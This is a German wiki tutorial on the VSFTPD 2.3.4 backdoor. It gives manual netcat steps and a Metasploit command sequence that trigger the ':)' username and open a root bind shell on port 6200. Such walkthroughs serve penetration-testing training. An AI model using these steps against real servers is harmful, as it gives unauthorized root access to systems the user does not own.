Metasploit VSFTP 2.3.4

Aus xinux.net
Zur Navigation springen Zur Suche springen

Schwachstelle

  • In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt
  • Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt

Manuell nachspielen

  • Zwei Terminals vorbereiten
  • Terminal 1 verbindet sich zum FTP-Server, nachdem der Exploit ausgeführt wurde, mit:
  • nc IP.des.ftp.servers 6200
  • Terminal 2 löst den Exploit aus
  • nc IP.des.ftp.servers 21
  • folgende Zeilen eingeben:
USER user:)
PASS pass
  • Wenn diese zwei Zeilen eingegeben wurden, kann man den Befehl auf Terminal 1 abschicken
  • Der Befehl sollte nach dem Ausführen nichts anzeigen, was bedeutet, dass die Verbindung aufgebaut wurde
  • folgedende Tests kann man durchführen, um zu sehen, ob man eine Shell hat:
  • ip a
  • id
  • pwd
  • ls

Metasploit benutzen

  • Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren
  • msfconsole
  • use exploit/unix/ftp/vsftpd_234_backdoor
  • set RHOSTS IP.des.ftp.servers
  • set RPORT 21
  • set payload cmd/unix/interact
  • exploit
  • Nun sollte man genau wie oben eine sehr minimale Shell haben